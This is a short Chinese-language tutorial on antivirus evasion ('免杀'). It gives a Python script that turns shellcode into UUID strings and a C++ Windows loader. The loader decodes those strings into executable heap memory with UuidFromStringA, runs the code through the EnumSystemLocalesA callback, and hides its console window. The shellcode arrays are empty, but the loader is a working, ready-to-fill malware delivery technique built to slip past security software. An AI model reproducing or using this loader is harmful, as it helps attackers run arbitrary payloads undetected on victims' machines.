免杀——UUID回调函数免杀

生成UUID的Python脚本：

import uuid
shellcode=b""
    
list = []
for i in range(50):
    bytes_a = shellcode[i * 16: 16 + i * 16]
    b = uuid.UUID(bytes_le=bytes_a)
    list.append(str(b))
with open("shellcode.c","w",encoding="utf-8") as f:
    f.write("const char* uuids[] ={")
    for UUID in list:
        f.write("\""+UUID+"\""+",")
    f.write("};")
print(list)

 

加载器：

#include <iostream>
#include <windows.h>

#include<Rpc.h>
#pragma comment(lib,"Rpcrt4.lib")

using namespace std;

// data段可读写
#pragma comment(linker, "/section:.data,RWE") 

// 不显示窗口
// 隐藏启动控制台
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) 
#pragma comment(linker, "/INCREMENTAL:NO") 

int main()
{
    const char* uuids[] = {"",""}

    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);//获得可执行的句柄
    void* ha = HeapAlloc(hc, 0, 0x100000);//申请堆空间
    if (ha == NULL)
    {
        cout << "内存申请失败！" << endl;
        return 0;
    }
    DWORD_PTR hptr = (DWORD_PTR)ha;
    int elems = sizeof(uuids) / sizeof(uuids[0]);//获得需要写入uuids数组元素个数
    for (int i = 0; i < elems; i++)
    {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr);//写入shellcode
        if (status != RPC_S_OK)//判断是否写入正常
        {
            cout << "UuidFromeStringA()!=S_OK" << endl;
            CloseHandle(ha);
            return -1;
        }
        hptr += 16;
    }
    
    EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);//回调函数,运行shellcode
    CloseHandle(ha);
    return 0;
}